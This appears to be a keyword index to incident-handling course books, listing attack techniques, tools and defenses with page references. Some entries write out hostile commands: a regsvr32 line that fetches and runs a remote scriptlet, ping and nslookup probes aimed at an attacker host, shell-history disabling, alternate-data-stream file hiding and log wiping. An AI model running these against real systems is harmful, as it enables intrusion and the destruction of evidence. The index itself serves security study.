Keywords Book Page Remarks

!exploitable 3 108 Automated crash-analysis tool made by Microsoft that estimates how exploitable a given flaw is
.sct files 3 154
.sct.. Running it 3 155 regsrv32 /s /n /u /i:http://server/file.sct scrobj.dll
It is
/etc/passwd 4 36 see Unix Password File Format
/etc/shadow 4 37 see Unix Shadow File Format

The ability to discern valid userIDs

--By observing how server responds to valid vs. invalid authenticate requests.
Attackers automate harvesting through scripts
Account Harvesting 4 84 --Using shell scriptng tool such as wget
Scripts based harvesting depeds on format of userID:
--Numeric
--User specified

Preparation:
--All authenticated error messages must be consistent:
--UserIDs should be tracked for a given number of bad logins and then temporarily lock out account.
----Account lockout could be timed to restore access after 30 minutes or require a call to the help desk
Account Harvesting: ----Be careful about the cost of helpdesk calls for account lockout resets
4 89
Defenses Slow down authentication and verification responses
--Wait 5+ seconds for verification then get lomger as the failed ligins/checks mount
--This can be on a per IP/User Agent String basis
Identification:
--Frequent login attempts with no activity even after successful login
Contain, Erad, Recov: N/A
Unix systems have four files better known as the accounting entries
utmp, wtmp, and btmp are not stored in ASCII, binary files
Accounting Entries: UNIX 5 84, 85 -lastlog stored in different manners on various systems
They can be edited only using specialized tools:
remove.c, wtmped.c, marry.c, cloak.c, logwedit.c and wzap.c

Particularly useful in getting through simple router-based firewalls. If a router allows "estalished" connections in (and is
Ack Scans 2 94 not using any stateful inspection), an attacker can use ACK scans to send packets into the network.
**See NMAP-Ack Scanning
ACK Storms 3 69 If attacker spoofs packets in a session, sequence numbers will be wrong
Both sides try to sort out the "confusion", resulting in an ACK storm
Active Server Pages 2 Microsoft's answer to CGI
Add N Edit Cookies-
4 137
Browsers Free Firefox plug-in (Specialized Browsers for Manipulating Data)
Aircrack-ng 2 64 Crack WEP keys
Alternate Data Streams
5 100
(NTFS) See Covering: Tracks: Alternate Data Streams (NTFS)
 Keywords Book Page Remarks

To implement a kernel-mode rootkit, an attacker tweaks the kernel in two ways, identified as elements A and B in the
figure: System call table and Evil Kernel Module S_execve Wrapper
By changing the system call table, and attacker can wield great power.
Alterning the Kernel 5 59 Planting malicious code inside the kernel
Implementating redirection
--You want to run one program, but kernel runs a different one
Hiding files and processes

Kernel-mode rootkit
-alters Windows device drivers associated with the file system
Alueron 5 77 - 78 -atapi.sys or iastor.sys
-Alters driver, but changes system so that driver signature check always passes
-Hides itself in unused space at the end of the drive
Encrypted using RC4
Analysis of Perimeter
and Host Perimeter 1 56
Detects View Diagram
Is the future
Application Whitelisting 3 150 --Attackers are starting to get used to it
--The good old days of AV blacklisting are at the end
--May take a while to complete
Application log are especially useful from
-Web apps
-App server for the thick-client
Cloud-based services
Application-Level Particularly useful data
1 58
Detection (Identification) -Dates
-Timestamps
-Users (especially admins)
-Actions and transactions, including user input variable values

Allow for the complete control of a victim system remotely accross the network
Client-server architecture
Very popular and many examples:
Application-Level Trojan:
5 9 - Poison Ivy, VNC, Dameware (commercial), Sub7, BlackShades, GhostRAT
Backdoor Suites
- Many common backdoors can self-install upon system exploit
- Payload option in Metasploit
Attackers can trick victim into running tool
Most of these tools can be discovered with an antivirus tool.
Apply Fixes (Lesson Based on what you learned, get appropriate approval and funding to fix your processes,technology, and improve incident-
1 129
Learned) handling capabilities
ARP 3 48 Maps IP to MAC
 Keywords Book Page Remarks

Step1: The attacker sets up IP forwarding so all packets sent to the attackers machine are redirected to the default gateway
(router) for the LAN. The attackers machine therefore acts much like the router itself
Step 2: The attacker sends a gratuitous ARP message to the victim machine, mapping the IP address of the default
ARP Cache Poisoning 3 51, 52
gateway for the LAN to the attackers MAC address. The victims ARP cache is therefore poisoned with false information.
Step 3: The victim sends traffic, but it's all transmitted to the attackers machine because of ARP cache poisoning
Step 4: The attacker sniffs the info using a sniffer
Step 5: The attacker's machine forwards all the packets back through the switch to the default gateway

ARP scans 2 94 Identify which hosts are on the same LAN as the machine running Nmap.
***The ARP scan does not work through a router, because ARP traffic just goes onto a single LAN
Arp spoof 3 49 Manipulate IP to MAC address mapping
Feeds false APR messages into a LAN so traffic is directed to the attacker for sniffing -------->ARP Cache Poisoning
ARP: Gratuitous 3 49 Gratuitous ARPs: Anyone can send ARP responses even though no one sends a ARP Request
--ARP cache poising
Arpspoof 3 51 Manipulate IP-to-MAC address mapping
Feeds false ARP messages into the LAN so traffic is directed to the attacker for sniffing -> ARP cache poisoning
ARPWatch 3 75 Looks for gratuitous ARP
ASLEAP 2 64 ASLEAP provides a dictionary-based attack against LEAP protocol used in some wireless environments
atpi.sys 5 77 driver modified by Alureon
Strictly control outgoing traffic
Start "hunting team" - looking for attack indicators. Hunt the hunters
Attack - Defense (aka --Check for long URLs
Metasploit Additional 3 133 --Check for DNS entries
Defenses - Preparation) --Check for beacon connections
--Check for odd services and .exes
Webcast on topic (Seth Misenar and Eric Conrad) Continuous Monitoring

Attack Trends 2 4 Five Steps that respresent the flow of an attack from initial information gathering to you are owned

Excellent Communication though the computer underground

--Chat, web, informal groupings, and hacker conferences
Attack: General Trends 2 10 Rise of Hacktivism
--Hacking to make a political point
--Not just web-site tampering
Ransomware

Computer crimes generally for profit, sometimes for hacktivism

How to make money on malicious code
--Sell the code for backdoors/bots
Attack: General Trends - --Spam and web-based advertising
Attacks for Fun and 2 11 --Pump and dump stock schemes
PROFIT --Phishing: e-mail, phone, and targeted (spear) phishing
--Denial of Service extortion
----Not just porn and gambling sites as targets any more
--Keystroke loggers stealing financial information
--Rent out armies of infected systems for all of the above
--RAM scrapers pulling CC numbers of POS terminals
 Keywords Book Page Remarks

The marriage of general attack tools and worms, viruses, and bots is resulting in powerful techniques
--Worms are increasingly being used to carry bots, backdoors, password crackers, and scanners
--Botnets are growing large with self-replicating code
Attack: General Trends -
2 14 --Several active botnets with more than 1 million hosts
Gold Age
Attacks from multiple sources simultaneously
--Distributed, cooperative attacks are all the rage
--Using groups of coordinating attackers or a single attacker with a botnet
Bottom line:Its a good time to be an attacker (or security practitioner)

Hack into web and file-sharing sites and alter software to include backdoor
Everyone who downloads and uses the tool is impacted
Attack: General Trends - Another approach is embodied in the ISR-Evilgrade tool
Software Distro Site 2 12 --Listens for software to request update
Attacks --Sends response with malware
--Currently includes modules for Java browser plug-ins, Winzip, WinAmp, MacOS X, OpenOffice, iTunes, LinkIn toolbar,
and more
--More than 60 software packages in total whose Internet updates can be subverted this way

Where a system automatically attempts to find a system with a name of WPAD and download a PAC file with Proxy
settings.
Attacking WPAD 3 74 --MitMf and Responder
Intercept traffic for specific domains (think PAC Backdoors) and harvest full HTTPS URL information for things like Session
IDs
Pacdoor us a tool that attacks WPAD

Bishop Fox's SearchDiggity is a fantastic suite that includes Google Diggity, Bing Diggity, and other search capabilities
- Malware Diggity, Data Loss Prevention Diggity, Flash Diggity
Automated Search
2 43 - Many of these "diggity" components require an API for the respective service
Engine
- Sometimes, free APIs provide fewer results than the web interface
Recon-ng is another powerful automated search tool

Uses driver infection technique twice

--Once to bypass Host Based Intrusion Detection (HIDS)
--The second is for persistence
* Uses the bootkit method to bypass driver signing requirements
Avatar Rootkit 5 68
* Attempts to detect whether the target system is a VM
-If not installed as Admin, it will automatically attempt local privilege escalation
-Does not infect the same driver for every system, chooses at random
--It is able to infect system drivers without altering their size
-Custom encryption use for Command and Control (C2)
Back Door Factory (BDF)
3 53
and BDF Proxy Intercepts executable files and automatically backdoors them in transit
 Keywords Book Page Remarks

System control:
Log keystrokes, get passwords
Create dialog boxes with attacker's text
Lock up or reboot the machine
Backdoor Capabilities 5 15 Get detailed system information
Access files
Create VPN through compromised systems
Camera and audio capture
Many of the same features found in Meterpreter
Many will have names that "blend in" on the system
-SCSI, UPS, server, client, host, and svchost
Backdoors 5 6 Allows an attacker to bypass normal security controls on the system. It allows an attacker to get around that so he doesn’t
have to provide a userID and password

Two techniques used by attackers to maintain their access into a system

Numerous attacks utilize Backdoors and Trojan Horses
A backdoor is a program that allows an attacker to access a system, bypassing security controls
Backdoors and Trojan
5 6 A Trojan Horse is a program that looks innocous but is actually sinister
Horses
Some backdoors are also Trojan Horses
--Examples is a innocous looking program that is actually a Netcat listener
--Rootkit components mimic standard operating system parts
--Important email attachment that contains a bot
Bad UserID 4 85 see screenshot

Uses an XSS hook to take interactive control of a victim browser

-Port Scanner
BeEF - Browser -Visited URLs (history grabber)
4 113
Exploitation Framework -Software inventory
Alter current web page view in browser (deface page)
-Deliver Metasploit exploit to another target
Bell-LaPadula Model 4 116 No write down, and no read up. This stops info leakage but it does allow for malware infection
Ruby framework is used to manipulate ARP mapping on the targeted systems and gateways. Also supports a wide variety
Bettercap 3 51 of other attacks as well. Automatically discovers targets, ARP cache poisons them, then runs multiple different parsers and
interception tools to hijack the traffic. Has the ability to manipulate TCP data on the fly

-allows routing across internet

-Autonomous Systems Numbers (ASNs) define IP addresses per router
BGP Hijacking 3 8 If there is an overlap, routers will route to the more specific ASN
-An attacker who either has compromised an ISP or can inject routes (think nation-states) can broadcast malicious routes
and reroute traffic
-hard to detect, look very similar to router misconfiguration issues
Know what normal traceroute information looks like
BGP Hijacking Defense 3 9 - can be difficult as routes can change, but new routes should be sensible
Train your users to identify potentially hijacked sessions (browser error, drop)
Bishop Fox's
2 43
SearchDiggity Bishop Fox's SearchDiggity is a fantastic suite that includes Google Diggity, Bing Diggity, and other search capabilities
Bloodhound 2 140 A tool which graphs the quickest way to get domain admin
Bot Distribution 4 68 Attackers install bots in numerous ways: Worm spread, carrying bot as a payload, E-mail attachment duping users into
running it, Bundled with some useful application or game.
 Keywords Book Page Remarks
Bots allow execution of many DoS exploits at once
Bot DoS Suites 4 154 --Try all the different attacks, just to see if one crashes the target
--bonk, jolt, land, nestea, teardrop, newtear, syndrop, WinNuke

Increasingly, worms are used to deliver bots

--Maintaining backdoor control of a machine
--Controlling an IRC channel (one of the earliest and most popular uses of bots)
Bots 4 67 --Acting as a mail relay
--Providing anonymizing HTTP Proxies
--Launching DoS floods

*spread through worms, email attachments, download, app embed

Rapid switching of bot controller
Bots - Fast Flux 4 70 --accomplioshed through DNS server friendly to attacker
--adds extra layers of obscurity
IRC on standard ports (TCP 6667)
IRC on nonstandard ports (such as TCP 3000 OR TCP 3333)
Bots: Communication 4 69 Waste (distributed Peer-2-Peer communications)
HTTP to one or more websites
Social networking site profiles: Twitter, YouTube, Google documents, etc.

IRC on standard ports (TCP 6667)

Bots: Communication IRC on nonstandard ports (such as TCP 3000 OR TCP 3333)
4 69
Channels Waste (distributed Peer-2-Peer communications)
HTTP to one or more websites
Social networking site profiles: Twitter, YouTube, Google documents, etc.
Morph its code for file infection
run commands, start services, open shells/ports/etc.
Bots: Functionality 4 73 add/remove/modifiy/copy files
scan and propagate
network sniff (passwords, email, etc.)

Browser Exploit Against

3 66 issue in TLS 1.0 and earlier, exploited using JavaScript in a browser to send encrypted messages with chosen plaintext and
SSL/TLS (BEAST)
a related attacked
Brute Force Attacks Try every possible password until you are successful. The amount of time required for a brute force attack is heavily
4 12
(Password Cracking) dependent on the complexity of the password encryption or hashing algorithm.
btmp file: Accounting btmp: File contains bad login entries for failed logging attempts
5 84
Entries Unix - Default location on Linux: /var/log/btmp, but not often used
Allows an attacker to execute arbitrary commands on your machine
Take over system or escalate privileges
Buffer Overflow 3 99 --Based on moving data around in memory without properly checking its size
--Same core issue (non-validated input) for heap and integer-based overflows
**Defense: add boundary checking to code. deny any requests that exceeds the buffer limit
Buffer Overflow - Use canaries and non-executable memory pages
3 128
Defenses --make better code in general
 Keywords Book Page Remarks
If you are a software developer:
Buffer Overflow -Always, always check the size of user input to make sure it fits
3 130 -Truncate data or give an error it it's to big
Defenses
-User input from GUI, network, command-line, environment variables..everywhere
Identification
-Unusual server crashes
-Execution of code from stack
-IDS/IPS alters
-Extra accounts appearing on system
Buffer Overflow Containment
3 134 -Deploy non-executable systems stacks
Defenses
Erad: Apply patches when available
-If system compromised as admin/root, rebuild from original media and patches
Recovery:
--Carefully monitor system after it is back in production

Configure the system so that no instructions can be retrieved from stack

Stops some buffer overflows, but not all
Buffer Overflow Still useful on sensitive systems
Defenses: BuildTime 3 127 Gresecurity at www.gresecurity.net
Preparation PaX at pax.gresecurity.net
SELinux at http://selinuxproject.org
Microsoft Enhanced Mitigation Experience Toolkit (EMET) helps address vulnerabilities in third-party software

Patch mgmt
Utilize host-based IPS that offers buffer overflow protection by
Buffer Overflow -Blocking certain calls into the kernel from certain applications
3 126 -Offering additional memory protection to ares like the stack
Defenses: Preparation
Deploy application white listing software
Configure systems so that no instructions can be retrieved from the stack

Preparation
Avoid programming mistakes
-Know what buffer overflows are and how to avoid them
Buffer Overflow Awareness/training for developers
3 131
Defenses: Programming -Code reviews
Writing Secure Code 2 by Howard and Leblanc
Secure Programming for Linux and UNIX Howto by David Wheeler

The three steps of the process of finding a flaw and creating an exploit are:
Buffer Overflow: Creating 1) Find potential buffer overflow condition
3 106 2) Push the proper executable code into memory to be executed
Exploit
3) Set the return pointer so that it points back into the stack for execution

Search the binary for known weak function calls

- Use debugger or strings
Buffer Overflow: Creating Use a tool for analyzing machine language code
3 107
Exploit (Step 1) - Find patterns consistent with buffer overflow flaws
- Metasploit's msfelfscan and msfpescan
Or if you have the source co
 Keywords Book Page Remarks
See screenshots.
Buffer Overflow: --To avoid the type of problem, add bounds checking to the program. Because the "gets" function has no bounds checking,
3 100
Example it should always be avoided. This could be fixed using the following syntax:
----fgets (bufferA, sizeof(bufferA), stdin);
Two Options
Buffer Overflow: -Use on off the shelf exploit someone else already created
3 105 exploits available via exploit-db.com, packetstormsecurity.org
Exploiting
- Create a new exploit for a new vulnerability
Take a brute-force approach
Shove a repeating pattern of arbitrarily long characters into every possible opening
Buffer Overflow: Finding Look for a crash where the Instruction pointer (EIP on x86/Intel) contains your pattern
Potential Buffer 3 109 -That means, you were able to overflow a buffer and get your input into the instruction pointer
Overflows - Cram Input -In 2009, Microsoft release an automated crash-analysis tool called !exploitable that estimates how exploitable a given
flaw is

Search the binary for known weak function calls

- Use debugger or strings
Use a tool for analyzing machine language code
- Find patterns consistent with buffer overflow flaws
- Metasploit's msfelfscan and msfpescan
Or if you have the source code, check that!
Buffer Overflow: Known Look for functions such as:
3 107
Weak Functions -strcpy -fgets
-strncpy - gets
-strcat - getws
-sprintf - memcpy
- scanf -memmove

User data is written into the allocated buffer by the subroutine

Buffer Overflow: If the data size is not check RP can be overwritten by user data
3 104 Attacker exploit places machine code in the buffer and overwrites the RP
Smashing the stack
When function returns, attacker's code is executed
Buffer Overflows: Cram Crams a series of letters to peg down where in the sequence the overflow occurs. This tipping point becomes the start of
Input Method: What to 3 110 your new RP
Cram
Programs that open files also have parsers, many of which have buffer overflow flaws
By just reading a given file created by an attacker, the bad guy could crash an application or possibly execute commands;
some applications that have a history of such flaws
-WinZip, iTunes, Wordpad
Buffer Overflows: File
3 138 -Symantec, Trend Micro, and McAfee antivirus tools
Parser
-EnCase and Sleuth Kit Forensics software
-Word, Power Point, Excel office tools
-Adobe Reader, Acrobat and Flash frequently have such flaws

Buffer Overflows: Return The attacker doesn’t know exactly which memory location the executable code is at
3 113 - Much of this depends on how the target program was complied
Pointer
- determined at runtime, a guessing game
 Keywords Book Page Remarks
Use a NOP sled to pad your exploit code.
Buffer Overflows: Return --Now your RP doesn't have to be as precise
3 114
Pointer NOP -Increases chances of IDS detection
Part of Burp suite of web application assessment and pen testing tools. It runs in Java and has many useful features,
Burp Proxy 4 139 including capability to accept regular expressions, which it applies to finding and altering HTTP requests automatically in
real time.

War driving tools, akin to NetStumbler

Traceroute GUI
Sniffer for capturing user ID and passwords
Cain 4 23, 24 Hash calculator for MD2, MD4, MD5, SHA1, SHA2 and RIPEMD-160
Password representation calculator for LANMAN, NT, MySQL, and Cisco PIX
Network neighborhood exploration
Windows password hash dumpper
ARP cache poisoning to redirect traffic
Remote promiscuous mode checker, such as Sentinel
VOIP sniffer, capturing traffic and converting it to a WAV file
RSA SecurID Token Generator (requires token's ASC file)

Get rid of LANMAN hashes on local systems

Cain - Defenses: Disable LANMAN challenge/response authentication
4 31
Preparation Implement SYSKEY:
Extra layer of encryption for the SAM Database and Protect your SAM Database.
Cain and Abel 4 23 Cain gathers information about local system ( and sniffed data) and includes a nice GUI
Abel runs in the background and allows remote dumping of information about a target

Microsoft LANMAN Stored in SAM and

NT Hash Active Directory
LM challenge/response (passed across the network
Cain as a Password NTLMv1 and NTLMv2 (passed across the network)
4 25-26 Password List (PWL) files from Windows 95-98
Cracker
Cisco-IOS Type 5 Cisco PIX
APOP MD5 hashes, CRAM MD5 hashes, RIPv2 MD5 hashes,
OSPF MD5 hashes, VRRP Network Computing's (VNC) 3DES, RADIUS Shared Secrets,
Microsoft SQL server 2000 passwords; MySQL323 passwords, IKE preshared passwords
See screenshot:
--Load dictionary files here.
Cain: Config 4 27 --Configure guess permutation modes here for hybrid attacks
--Current status of the cracking attack shown here.
Cain supports dictionary, brute-force, basic hybrid, and rainbow table password cracking

Cain: Cracking see screenshot

4 28 After loading the password representation, selecting a dictionary, and configuring the options, the attacker can run Cain by
Passwords
clicking the "Start" button.
 Keywords Book Page Remarks

By default, both LANMAN and NT Hashes are stored on Windows NT/2000/XP/2003

--On Windows 2000/XP/2003, passwords of 14 characters or less are hashed
--Pad to exactly 14 characters
Cain: LANMAN Hashes 4 16, 17, 18 --Convert to all uppercase characters
--Split the 14 characters into two 7-character strings
--Use each 7-byte string as a DES key
** No salt, very weak

NT hash authentication is better, but not great

--Uppercase/lowercase are preserved (thankfully)
Cain: NT Hashes 4 19 --Password is hashed using MD4 to create 16 byte hash
--If the password is greater than 14 characters, no LANMAN hash is stored ( that's 15 or more characters)
For both LANMAN and NT hashes, no salts are used,
--You can precompute a dictionary of hashed passwords

Cain can crack numerous Windows password formats:

--Microsoft LANMAN Stored in SAM and
--NT Hash Active Directory
--LM challenge/response (passed across the network
Cain: Password Formats 4 25, 26 --NTLMv1 and NTLMv2 (passed across the network)
--Password List (PWL) files from Windows 95-98

Cisco-IOS Type 5 Cisco PIX

APOP MD5 hashes, CRAM MD5 hashes, RIPv2 MD5 hashes,
OSPF MD5 hashes, VRRP Network Computing's (VNC) 3DES, RADIUS Shared Secrets,
Microsoft SQL server 2000 passwords; MySQL323 passwords, IKE preshared passwords
system calculates the hash of code as it's pushed on the stack
Canary 3 128
--if hash changes, the canary sounds the alarm
Canary - Terminator 3 128 Type of Canary
Canary - XOR 3 128 reference
Carna Botnet 4 61 Fast spreading Worms
specification for interfacing server executed programs with WWW pages. Web server executes CGI program using input
CGI Program 2 supplied by the client's HTTP request
Called from web client, but execute programs on the server
client requests a webpage that triggers cgi. Generates a HTTO method or filling in an HTML form which generates a HTTP
CGI/PHP/ASP/JSP runs 2 Post method.
Web server executes the script/program and returns the output to the client

-remove all default web material - HTML, CGI scripts, ASPs, Images
-apply all system and server patches
CGI/Web Scanners -run web server with minimal privileges (Not root).
2
Defense -consider chrooted environment
ID: Utilize an Intrusion Detection System
-Most CGI/Web Scanners trip a lot of signatures.
 Keywords Book Page Remarks
Have the system admins look for unusual:
Processes and services
Files
Network usage
Cheat Sheet Elements, Scheduled tasks
1 62
(Windows and Linux) Accounts
Log entries
Other unusual items
Additional supporting (third party tools)

clearev 5 111 command in meterpreter that wipes log files

Automated code-review tools can search for know weak functions and heuristic checks to see if buffer usage is ok
Free automated code-checking tools for C and C++
RATS: Rough Auditing Tool for Security
Flawfinder: dwheeler.com/flawfinder
Code Checking Tools 3 132 Commercial code-analysis tools: Fortify Source Code Analyzer, Coverity Static Analysis, Klockwork Insight Pro, and
GrammaTech's CodeSonar
Commercial binary-analysis tools

Various code search engine tools are available (koders.com is one of the most widely used) Google shut down its code
search feature
Code Search Engine Koders.com crawls the Internet to find source code
3 108
Tools c, c++, Perl, Python, Ruby, Java, and more
Caches source code and allows for flexible searches

Allows remote code execution when the web app can be tricked into executing code supplied by the user
ShellShock
--web apps either run a shell or program to handle inputs
Command Injection 4 91 --If the input contains a command for the shell, an attacker may get that command to run

Use commands like ping and nslookup to test for vulnerability

-these cmds dont require privs and apply to windows/linux both
-difficult to detect b/c they are so benign

Allows remote code execution when the web app can be tricked into executing code supplied by the user
ShellShock
--web apps either run a shell or program to handle inputs
Command Injection 4 91-93 --If the input contains a command for the shell, an attacker may get that command to run

Use commands like ping and nslookup to test for vulnerability

-these cmds dont require privs and apply to windows/linux both
-difficult to detect b/c they are so benign
Commands for Counting 4 167
various commands for counting number of lines of output (use FIND on Windows), use (grep on Linux)
 Keywords Book Page Remarks

Preparation:
--Educate developers to be careful with user input
--Conduct vulnerability assessments and penetration tests regularly (Sanitize your Input!!!)
Identification:
--Look for unusual traffic outbound from web servers
Commands Injection - --Look for extra accounts or other configuration changes on servers
4 94
Defenses Containment:
--Remove attacker software and accounts
--Check for rootkits
--Fix the application, and consider a Web Application Firewall
Eradication:
--If rootkit were installed, rebuild
Recovery: Watch for attacker's return
To discover a command injection flaw, an attacker could choose from several commands to try
Some of the most valuable are:
--ping [AttackerIPaddress]
--nslookup[AttackerDomainName]
--The attacker can then sniff to see if packets come from the target
Commands Injection: These commands are ideal because:
4 92, 93
Command to Inject --They DO NOT require high privileges to execute and they are benign
--They show there is outbound traffic from the target
--Work in a blind fashion because the attacker can sniff to see if they worked without seeing the output of the command

Common Linux Rootkit

5 49 see screenshots and Rootkits - User-Mode Linux
Backdoor Components
Common Linux Rootkit
5 50 see screenshot and Rookits - User-Mode Hiding
Hiding Components

System control:
Log keystrokes, get passwords
Create dialog boxes with attacker's text
Common Remote Lock up or reboot the machine
Control Backdoor 5 15 Get detailed system information
Capabilities Access files
Create VPN through compromised systems
Camera and audio capture
Many of the same features found in Meterpreter
Many will have names that "blend in" on the system
-SCSI, UPS, server, client, host, and svchost
Business routinely are involved in the activities of collecting information about their competition or trying to prevent the
Competitive Intelligence 1 158 competition form getting information about their activities. As long as this is legal, we generally refer to this as Competitive
Intelligence

Connect Scans 2 94 Complete the 3-way handshake; are slow and easily detected. Because the entire handshake is completed for each port in
the scan, the actiities are often logged on the target system.
 Keywords Book Page Remarks
use Netflow data to reveal patterns in connection statistics
Connection Data - Systems beaconing out every 30 seconds
1 135 - Systems beaconing out at random intervals
(Enterprise-Wide IR)
- Connections which live for far longer than they should
The goal of the Containment phase is to stop the bleeding
sub-phases of Containment:
Containment 1 98 -short-tem = just to stop the damage
-System back-up
-long-tem = bad guy is denied access
-Denial of Service
-Compromised Information
-Compromised Asset
-Unlawful Activity
Containment- Incident - Internal Hacking
1 101
Categories -External Hacking
-Malware
-E-Mail
-Policy Violations

Identify a senior management sponsor (CISO, CIO, Legal Counsel, etc.)

Containment - Inform --Keeping mgmt and helpdesk in loop alleviates probs down the road
1 102
Management -Make sure both take notes of their actions and observations
Containment - Initial Keep a low profile
1 105
Analysis -Avoid looking obvious methods (ping, traceroute, nslookup)
After backups are made, we can start reconfig system
--implement long-term containment and move toward recovery
Containment - Long Ideal: If the systemcan be kept offline, move to the Eradication phase
1 112 -Get rid of the attacker's stuff
Term
Less-than-ideal, but-sometimes-necessary: If the system must be kept in production, perform long-term containment
actions

Numerous potential actions, including

- Patch the system
- Patch neighboring systems
- Insert Intrusion Prevention Systems (IPS) or in-line Snort
- Null routing
Containment - Long - Change passwords
1 113
Term Actions - Alter trust relationships
- Apply firewall and router filer rules
- Remove accounts used by attacker
- Shutdown backdoor processes used by attacker
 Keywords Book Page Remarks
Notify incident-handling team and managers
Remember vertical and horizontal reporting
-Inform management (of course)
-Inform impacted business unit, helpdesk, reponse teams, etc.
Containment - Notify and
1 103 Create entry in incident tracking system
Track Incident
-CyberSponse is a commercial IR tracking system
-There's the free RTIR Incident Response Tracking tool
-The Orion Live CD includes templates, tracking forms, and more

Try to prevent the attacker from causing more damage

--gather sound evidence through image-creation process
Containment - Short- Actions include: unplug power/network, isolate on vlan, apply router/firewall/dns changes to prevent traffic
1 106
Term --WordWebBugs can track attack by ID where you data is popping up

Containment- record category, severity, and sensitivity

1 101
Characterize Incident *** Options listed on pg 101
Criticality
Containment- 1) Incident impacts critical systems: 60 min
1 101 2) Incident impacts non-critical systems: 4hrs
Characterize Incident
3) Possible incident, non-critical: 24 hrs
Sensitivity: Who should be informed?
Containment- 1) Extremely sensitive (CSIRT, mgmt)
1 101 2) Sensitive(CSIRT, mgmt, sys owners, ops)
Characterize Incident
3) Less sensitive (employees informed of isolated virus infection)
Web-app for tracking IH and consolidating evidence
--allows formal notes
Containment -CyberCPR 1 104 --hashes/encrypts all evidence uploaded
-includes secure comms
Deploy a small on-site team to survey the situation
Containment - -Typically same personnel as the Identification team
1 100 -Secure the area
Deployment
-If possible, use preprinted survey form
Keep system owners and administrators in the loop
*Don't play the "blame game"
Continue to Consult with - Never allow fault to be an issue during incident handling
System Owners 1 114 - Assign fault now closes down important avenues of investigation
(Containment) - Sometimes, as you learn more, assumptions change
- fault can be assigned during the Lessons Learned phase

Copyrights 1 180 Protect works/content, particular expressions of ideas

Counting Half-Open
4 178-179
Connections in Linux Use the netstat and grep commands to count half-open connections

Counting Half-Open
4 172
Connections in Windows
Use the netstat and find commands to count half-open connections
Counting Running
4 176-177
Processes in Linux Use the ps command to list processes and the grep command to count them
 Keywords Book Page Remarks
Counting Running
4 171
Processes in Windows various commands for counting Running Processes in Windows (tasklist command w/ find cmd) (WMIC command)
-Traditional crimes facilitated by a computer
Country-Specific Cyber -Crimes in which the computer is the target
1 183
Crime Laws Always incorporate your organization's legal dept into any incident or interaction w/ law enforcement

Use logging server

Covering Tracks - Log -Windows supports syslog but tools are needed to convert file type
5 121
Editing Defense Evt2sys, Sl4nt, Kiwi, Snare Agent
Employ integrity monitoring: Mysyslog

Covering Tracks On the Numerous tools carry data inside the payloads of ICMP packets
5 119 --ptunnel (TCP over ICMP Echo and Reply), Loki (Linux Shell), ICMP Shell (Linux), PingChat (Windows chat program),
Network: ICMP Tunnels
ICMPCmd (Windows cmd.exe access)

Covering Tracks: utmp, wtmp, and btmp are not stored in ASCII, binary files
Accounting Entries 5 84, 85 -lastlog stored in different manners on various systems
(UNIX) They can be edited only using specialized tools:
remove.c, wtmped.c, marry.c, cloak.c, logwedit.c and wzap.c

smbclient can get data from ADS (windows or linux)

-prior to Vista and 2008 server, no built-in finding or deleting a stream
Covering Tracks: --To delete a stream, you could move the file to FAT partition, and then move it back.
Alternate Data Streams 5 100 --On Vista, Win2008 and Windows 7, the dir /r option for listing ADS
(NTFS) Will not show ADS behind Windows reserved filenames
--COM1, COM2, LTP2, AUX, etc..
*** LADS is a tool dedicated to finding ADSs in NTFS
-most AV doesn't scan ADS routinely

Shell history is written when the shell is exited

When editing the history, the command used to invoke the editor will be placed in the shell history file
The attacker could edit the file, exit the shell, start another shell, edit the history file again to remove it, but it will be added
Covering Tracks: Editing again!
5 82 --A chicken and the egg problem
Shell History Problems
Solutions
1) Kill the shell, so that it cant write to the most recent shell history, including the command used to edit it
--# kill -9 [pid] ..or.. #killall -9 bash
2) Change the environment variable HISTSIZE (for bash) to zero
--# unset HISTFILE then kill -9 $$
Use antivirus tool to find malicious code in streams (nearly all have it)
Covering Tracks: Finding Many anti-spyware tools lack ADS detection functionality
5 101
Hidden Streams Third-party tools for finding alternate data streams in NTFS
--LADS or Streams
 Keywords Book Page Remarks

NTFS supports alternate data streams

Multiple streams can be attached to each file or directory
Attacker's files can be hidden in a stream behind normal files on the system
--Such as notepad.exe or word.exe (or anything else)
Use type command built into Windows to add alternate data stream
Covering Tracks: Hiding --type hackstuff.exe > notepad.exe:stream1.exe
5 99 Or, use the cp program from the NT Resource Kit
Files (NTFS)
--cp hackstuff.exe notepad.exe:stream1.exe
To get data back, it can be copied out of the stream
--cp notepad.exe:stream.exe1 hackstuff.exe
Alternatively, you can create an alternate data stream attached to a directory by simply typing:
--notepad <file_or_directory>:<stream_name>
If you know the stream exists and you know its name, you can view its contents using the more command
--more < c:\file:stream1

Covering Tracks: Hiding

5 77 Easiest way to hide files is to name them something like "." or ".."
Files in UNIX
Attackers will disguise files and directories bynaming them dot-space, dot-dot space, dot-dot-dot, or even just space

c:\Windows\System32\winevt\Logs
-AppEvent.Evtx- Application-oriented events
-SecEvent.Evtx-Security events
-SysEvent.Evtx-System events (readable by all users)
files are write-locked on a running system, stored in binary
--Attacker can delete logs or generate bogus logs to overwrite data
--both are easily noticed but can still hide important log information
** Theoretically an attacker could boot to Linux and edit the offline NTFS logs
-no public software exists, but the capability is there
Covering Tracks: Log Meterpreter clearev can wipe logs, currently no line-by-line ability
5 109
Editing - (Windows)
The three primary Windows event types are stored temporarily in these log files:
--SYSTEM.LOG
--SECURITY.LOG
--APPLICATION.LOG

These files are not readable for all practical purposes.

Each .LOG file is periodically rewritten into an .EVT format automatically, in the following files:
--SYSEVENT.EVTX
--SECEVENT.EVTX
--APPEVENT.EVTX
 Keywords Book Page Remarks

Main log files can be found by viewing /etc/syslog.conf

- /var/log/secure
- /var/log/messages
Covering Tracks: Log
5 80 - /var/log/httpd/error_log
Editing - Unix/Linux
- /var/log/httpd/access_log
These log files (usually in /var/log) are written in ASCII
They are often edited by hand using a text editor or script
--If the log is very large, tey usually use a perl script to edit it

A list of the most recent N commands

- 500 by default in bash, although 1000 on some Linux distros
-~/.bash_history, for example
Covering Tracks: Shell
5 81 Written in ASCII, and can be edited by hand with the permissions of the user or root
History
-Attackers remove suspicious commands
-Some even add commands to implicate some other user in the attack
**editing the history will leave a new entry that the history was edited
--only solution is to turn off history, but that is also an indicator in itself

Attacker want to put files in a place where they wont be noticed

Popular locations for hidden stuff include:
--/dev
Covering Tracks: Where
--/tmp
attackers put Hidden 5 78
--/etc
UNIX files and Dirs
--Other complex components of the file system
----/usr/local/man
----/usr/src
----And numerous others

Preparation
